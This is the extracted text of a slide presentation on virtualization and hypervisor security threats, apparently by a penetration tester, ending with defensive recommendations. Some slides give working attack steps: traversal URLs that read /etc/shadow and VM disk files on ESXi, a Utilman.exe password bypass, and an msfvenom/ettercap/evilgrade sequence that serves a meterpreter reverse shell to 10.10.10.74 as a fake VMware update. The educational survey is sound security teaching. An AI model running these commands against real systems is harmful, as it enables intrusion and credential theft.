Download - Virtualization security and threat
-
# WHO AM I
Senior Security EngineerPenetration TestingIncident Response
-
DISCLAIMERSThis presentation do not encourage people to hack.
(For educational purpose only)
AND
Presentation do not cover all parts of virtualization Technology area.
(It is rearranged from my thesis research literature review)
-
TOPIC Virtualization and hypervisor Virtualization threats and issues Vulnerability Statistic of widely used Hypervisors Guest VM Attack Virtualization environment network Attack Hypervisor Attack Hypervisor management and API Attack Host Attack from VM Docker Breakout by shocker Use Virtualization as Attack Tools Security for Virtualization
-
Virtualization
-
VIRTUALIZATION
CloudgoogleiCloud
-
VIRTUALIZATION
CloudgoogleiCloud
-
VIRTUALIZATION
-
VIRTUALIZATION
vShpere ClientvCenter
XenCenter
Virt-manager
-
Hypervisor
-
HYPERVISOR
-
HYPERVISOR
-
VMVM
VM VMVMVMVMVM VM
HYPERVISOR
-
VMVM
VM VMVMVMVMVM VM
HYPERVISOR
VMwareworkstation
-
HYPERVISOR VS DOCKER**Application containers
-
Virtualization Threats
-
Vulnerability Statistic
-
CVE-DETAIL
cvedetails.com
-
107
118
5458 58
45
cvedetails.com
Bare-metal Hypervisor vulnerability
2008 2009 2010 2011 2012 2013 2014 2015
-
0 20 40 60 80 100 120 140 160 180 200
DoS
Gain Privileges
Overflow
Code Execution
Gain Information
Memory Corruption
Bypass something
Directory Traversal
XSS
Bare-metal Hypervisor vulnerability 2008 -2015
cvedetails.com
52%15%
12%
7%6.5%
4.5%2%
1%0.5%
-
IS VIRTUALIZATION THREAT DIFFERENCE FORM TRADITIONAL ENVIRONMENT ?
-
OS : Linux , Windows, Solaris
Application : Web , Web Service, Mail , FTP, DB
Hardware : CPU , Memory, Storage, NIC, Network
Traditional
Operating System
-
OS : Linux , Windows, Solaris
Application : Web , Web Service, Mail , FTP, DB
Hardware : CPU , Memory, Storage, NIC, Network
XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, Arp Poisoning
Operating System
Traditional
-
OS : Linux , Windows, Solaris
Application : Web , Web Service, Mail , FTP
Hypervisor components : Kennel , Lib, API, Network
Hardware : CPU , Memory, Storage, NIC, Network
Virtualization
-
OS : Linux , Windows, Solaris
Application : Web , Web Service, Mail , FTP, DB
Hypervisor components : Kennel , Lib, API, Network
Hardware : CPU , Memory, Storage, NIC, Network
XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, Arp Poisoning
Virtualization
AdditionalAttack Surface
-
GENERAL SECURITY ISSUE FOR VIRTUALIZATION Information Leakage.
Unauthorized Access Intentionally OR Unintentionally USERS OR Administrators
Data Remain In Storage Data Ownership. Data Migration when end of service. Multi tenancy
Share resource Use VM to commit fraud or Crime
Laws and regulations
-
VIRTUALIZATION TECHNICAL SECURITY ISSUE
-
GUEST VM ATTACK Traditional Attacks According To Services Guest VM attack other Guest VMs (Same network segment) Guest VM attack other Guest VMs on the same Hypervisor (VM hyper Jumping) Cross-VM Attack (Side Channel Attack) Guest Stealing Guest Copy
-
TRADITIONAL ATTACK
Hypervisor
Guest VM1 Guest VM2
-
VM ATTACKS OTHERS VM
Hypervisor
Guest VM1 Guest VM2
-
VM HYPER JUMPING
Hypervisor
Guest VM1 Guest VM2
-
CROSS-VM ATTACK (SIDE CHANNEL)
Hypervisor
Guest VM1 Guest VM2
Time orComputational Power
-
GUEST STEALING
https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk
Hypervisor
ManagementAPIfile
-
GUEST STEALING
https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk
Hypervisor
ManagementAPIfile
-
GUEST STEALING : VASTO
-
GUEST STEALING : VASTO
-
GUEST COPY (Authorized)- Passwords
- OS- Mail
- Cookies- Browser history- Sensitive Data- Databases- Configurations- Source codes- Software licenses- Many more...
-
GUEST COPY
Copy them
(Unauthorized)
-
IF ( VM ==win7 or XP)
-
IF ( VM ==2008 or 2012)
How about password ?
-
How about password ?Ans: Reset it !!!
IF ( VM ==2008 or 2012)
-
Insert CD to make tricky password reset via repair option
-
Copy cmd.exe to be Utilman.exeAnd reboot
-
Press Windows Key + U
-
Bravo !!!
-
ps :http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html
Or add another account as administrator and hashdump
And crack it by JTR
-
IF ( VM ==Unix) THEN singel_mode ();
-
Forensic tools to access dataVMDK
-
Forensic tools to access dataSnapshot
-
NETWORK ATTACK Traditional Attacks According To Services vSwitch Attack Sniffing Scanning Mitm
-
OPEN VSWITCH CVE-2012-3449 INSECURE DIRECTORY PERMISSIONS VULNERABILITY CITRIX XENSERVER VSWITCH CONTROLLER VERSION 6.0.2.
- vSwitch Attack
-
- SNIFF
LNot much sensitive in modern VM/Hypervisor
-
- SCAN
-
Directory Traversal Brute Force Attack
Auxiliary/Scanner/Vmware/Vmware_http_login Burp Suite Intruder
Response Splitting
MANAGEMENT API
-
CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability
Vmware Esxi 3.5 Or Earlier Fail To Sufficiently Sanitize User-supplied Input Data Exploiting The Issue May Allow An Attacker To Obtain Sensitive Information
From The Host Operating System
-
Hypervisor
ManagementAPI
System file
CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability
-
https://192.168.254.158:8333/sdk/../../../../../../etc/shadow
Hypervisor
ManagementAPI
System file
CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability
-
CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability
-
ESX root passwordCrack it with JTR !!!
-
BRUTE FORCE ATTACKBy Metasploit VMware Auxiliary Modules
-
BRUTE FORCE ATTACKBy Burp Suite Intruder
-
NO-CVE : HTTP RESPONSE SPLITTING
-
NO-CVE : HTTP RESPONSE SPLITTING
-
MANAGEMENT ENVIRONMENT ATTACK Hooking MiTM Fake Update
Vmware-vilurker Evilgrade
-
HOOKING
-
MITM
Hypervisor
Management SoftwareAttackerHypervisor
-
MITMWhich picture show we are under MiTM attack ???
-
MITM
We never know !!!!
-
MITMWhich picture show we are under MiTM attack ???
-
MITM
We never know again!!!!
-
MITM
-
MITM : vSphere Client
-
MITM : XenCenter
-
Admin
FAKE MANAGEMENT SOFTWARE UPDATE
Concept
Internet
softwareupdate.vmware.comESXi
-
Admin
FAKE MANAGEMENT SOFTWARE UPDATE
Concept
Internet
softwareupdate.vmware.comESXi
-
Admin
FAKE MANAGEMENT SOFTWARE UPDATE
Concept
Internet
softwareupdate.vmware.comESXi
APR SpoofingRougeDNS
-
Admin
FAKE MANAGEMENT SOFTWARE UPDATE
Concept
Internet
softwareupdate.vmware.comESXi
APR SpoofingRougeDNS
-
FAKE MANAGEMENT SOFTWARE UPDATEBy vmware_vilurker
Credit:Watcharaphon Wongaphai
-
FAKE MANAGEMENT SOFTWARE UPDATEBy vmware_vilurker
-
FAKE MANAGEMENT SOFTWARE UPDATEBy vmware_vilurker
-
FAKE MANAGEMENT SOFTWARE UPDATE
By Evilgrade
-
FAKE MANAGEMENT SOFTWARE UPDATE
By Evilgrade
-
create msfpayload > agent.exe (/usr/share/isr-evilgrade/agent/) create handler wait reverse connection add domain upgrade version into /etc/ettercap/etter.dns ettercap -tqm arp:remote /victim/ /dnsserver real/ -> p select dns_spoof run evilgrade
FAKE MANAGEMENT SOFTWARE UPDATE
By Evilgrade
-
root@localhost:~# msfvenom p wondows/meterpreter/reverse_tcp LHOST=10.10.10.74 LPORT=8080 f exe > /opt/agemt.exe
root@localhost:~# cp /agent.exe /usr/share/isr-evilgrade/agent/agent.exe
root@localhost:~# echo softwareupdate.vmware.comA 10.10.10.74" >> /usr/local/share/ettercap/etter.dns
root@localhost:~# sudo ettercap -tqm arp:remote // //press proot@localhost:~# dns_spoof
root@localhost:~# msfconsole
msf>use exploit multi/handler
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 10.10.10.74
msf>set LPORT 8080
msf> exploit
root@localhost :~# evilgradeevilgrade >config vmware
evilgrade >start By Evilgrade
-
FAKE MANAGEMENT SOFTWARE UPDATEResult
-
FAKE MANAGEMENT SOFTWARE UPDATEResult
-
Admin
FAKE MANAGEMENT SOFTWARE UPDATE
Result
Internet
softwareupdate.vmware.comESXi
APR SpoofingRougeDNS
-
HYPERVISOR ATTACK Compromised Hypervisor (Hyper-jacking)
Take Full Control Running A Rogue Hypervisor On Top Of An Existing Hypervisor Install Hypervisor Root Kits
Denial Of Service (Hypervisor Is A Great Single Point Of Failure) HyperCall Hooking/Attack
-
- DENIAL OF SERVICE : PSOD
-
- HYPER CALL HOOKING ATTACK
XEN i386
Paravirtualization
-
EXAMPLE CVE-2013-4553 : XEN DOMCTL_GETMEMLIST HYPERCALL IN XEN 3.4.X THROUGH 4.3.X CVE-2012-3495 : XEN HYPERCALL PHYSDEV_GET_FREE_PIRQ
BUFFER OVERFLOW DENIAL OF SERVICE EXPLOIT CODE TO EXECUTE IN PRIVILEGE
- HYPER CALL HOOKING/ATTACK
-
CVE-2014-4947 AND 4948LOCAL USERS DENY SERVICE AND OBTAIN POTENTIALLY SENSITIVE INFORMATION
CVSS V2 Base Score: 10.0 (High) Citrix Xenserver 6.2 SP1 And Prior Versions A Local User On The Guest System can Trigger A Buffer Overflow In HVM
(Hardware Virtual MACHINE) Graphics Console Support
Exploit On The Guest System Can Cause Denial Of Service Conditions Obtain Potentially Sensitive Information
-
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources
-
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources
AAAAAAAAAAAAAAAAAAAA...AAAAA
-
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
ResourcesAAAAAAAAAAAAAAAAAAAA...AAAAA
-
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources
AAAAAAAAAAAAAAAAx00x00x00
-
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resourcesxxxx
-
CVE-2015-3456 : VENOM Virtualized Environment Neglected Operations Manipulation Discovered by Jason Geffner, Crowdstrike senior security researcher The bug (Buffer Overflow) is in QEMUs virtual floppy disk controller (FDC). This vulnerable fdc code is used in numerous virtualization platforms and appliances,
notably XEN, KVM, VIRTUALBOX, and the native QEMU client.
Attacker need to have administrative or root privileges in the guest operating system in order to exploit VENOM
The VENOM vulnerability has existed since 2004, when the virtual floppy disk controller was first added to the QEMU codebase.
http://www.rapid7.com/resources/videos/venom-vulnerability-explained.jsp
-
Exploit to make Buffer overflow within the FDC, break out of the VM
-
Exploit to make Buffer overflow within the FDC, break out of the VM
Can access other VMs within that hypervisor
-
Exploit to make Buffer overflow within the FDC, break out of the VM
Can access other VMs within that hypervisorCan jump other VMs in other hypervisor
-
Exploit to make Buffer overflow within the FDC, break out of the VM
Can access other VMs within that hypervisorCan jump other VMs in other hypervisor
Can access to the underlying bare metal systems hardware and use that to see other systems on the hypervisor's network
-
HOST ATTACKVM ESCAPE
ResourcesHypervisor
Host
VM
-
HOST ATTACK
- USING PATH TRAVERSAL VULNERABILITY IN VMWARE'S SHARED FOLDERS
- CVE-2008-0923
- INSUFFICENT INPUT VALIDATION
VM ESCAPE
0xc20x2e0xc20x2e 0x2e0x2e ..
../../../../../../boot.ini
-
VM ESCAPEmodify VMFtp's source code to replace all occurrences of '+' with '\xc2' in an input pathname
-
VM ESCAPE
OR
-
VM ESCAPE
Modify task schedule as new job to run metX.exe and put to back to /windows/tasks
-
Put create task to host
Generate meterpreter
VM ESCAPE
-
VM ESCAPE
Run handler and wait until time to run Task
And Compromised
-
CVE-2012-0217 Virtualization Software Vulnerable To Privilege Escalation Attacks On Intel 64bits CPU
Some 64-bit operating systems and virtualization software programs are vulnerable to local privilege escalation attacks when running on intel processors (cpus)
Implemented The SYSRET Instruction In Their X86-64 Extension Attackers could exploit the vulnerability to force intel cpus to return a general
protection fault in privileged mode
Windows 7 And Windows Server 2008 R2, The 64-bit Versions Of Freebsd And Netbsd, The Xen Virtualization Software, As Well As Red Hat Enterprise Linux And SUSE Linux Enterprise Server, Which Include The Xen Hypervisor By Default
Architecture Vulnerability.
-
Architecture Vulnerability.CVE-2012-0217 Virtualization Software Vulnerable To Privilege Escalation Attacks On Intel 64bits CPU
code
-
MALICIOUS SCRIPT IN HYPERVISOR
-
ROP Xen Hypervisor Utilizing Return-oriented Programming (ROP). It modifies the data in the hypervisor that controls whether a VM is privileged
or not and thus can escalate the privilege of an unprivileged domain (DomU)
-
ROP
-
ROP
-
ROP
-
ROP Make Buffer overflow
-
ROP
LUnfortunately, this technique need a lot of factor to make it possible in today Hypervisor
-
FUZZING
-
USE VIRTUALIZATION AS ATTACK TOOL- Host Stealing (P2v host cloning)
VMware vCenter Converter Standalone
-
10.200.1.10
Administrator
*************************
-
10.200.1.100
root
*************************
-
10.200.1.10010.200.1.10
-
- Compromised Host- Get root/admin password0
-
10.200.1.10
Administrator
*************************Victim
-
10.200.1.100
root
*************************
ESX, Vmwareworkstation onHacker Machine
-
10.200.1.10010.200.1.10
Wait until finish
-
Dont forget to Dump RAM, too!!!P2V dont copy current data in RAM from victim server
volatility
Meterpreter pmdump
-
Finish ....and Completely PWNHave more time to get- DB ConnectionStrings- Sever Configurations- Source code- Crack more password- Dig more sensitive files
-
But.. Noting easy in the real life
-
But.. Noting easy in the real life
-
DOCKER BREAKOUTBY DOCKER SHOCKER
https://github.com/gabrtv/shocker
-
DOCKER BREAKOUTBY DOCKER SHOCKER
-
DOCKER BREAKOUTBY DOCKER SHOCKER
-
DOCKER BREAKOUTBY DOCKER SHOCKER
-
Security for Virtualization
-
SECURITY FOR VIRTUALIZATION Contract , Law and regulation System Segmentation
VLAN /SDN Dedicate Management Network Dedicated Storage Networks Protect All Virtual System File (Snapshot , VHDD, Configuration)
Update Patches System Hardening Implement Security Monitoring And Detection Tools Security Assessment !!!! BCP / DRP
-
CONCLUSION Traditional Attack method can be use to attack Virtualization Technology Virtualization Technology has more attack surfaces Hypervisor is concerned as single point of failure Secure by design, Security Protection and hardening are important for
Virtualization Technology
-
Join to get security news update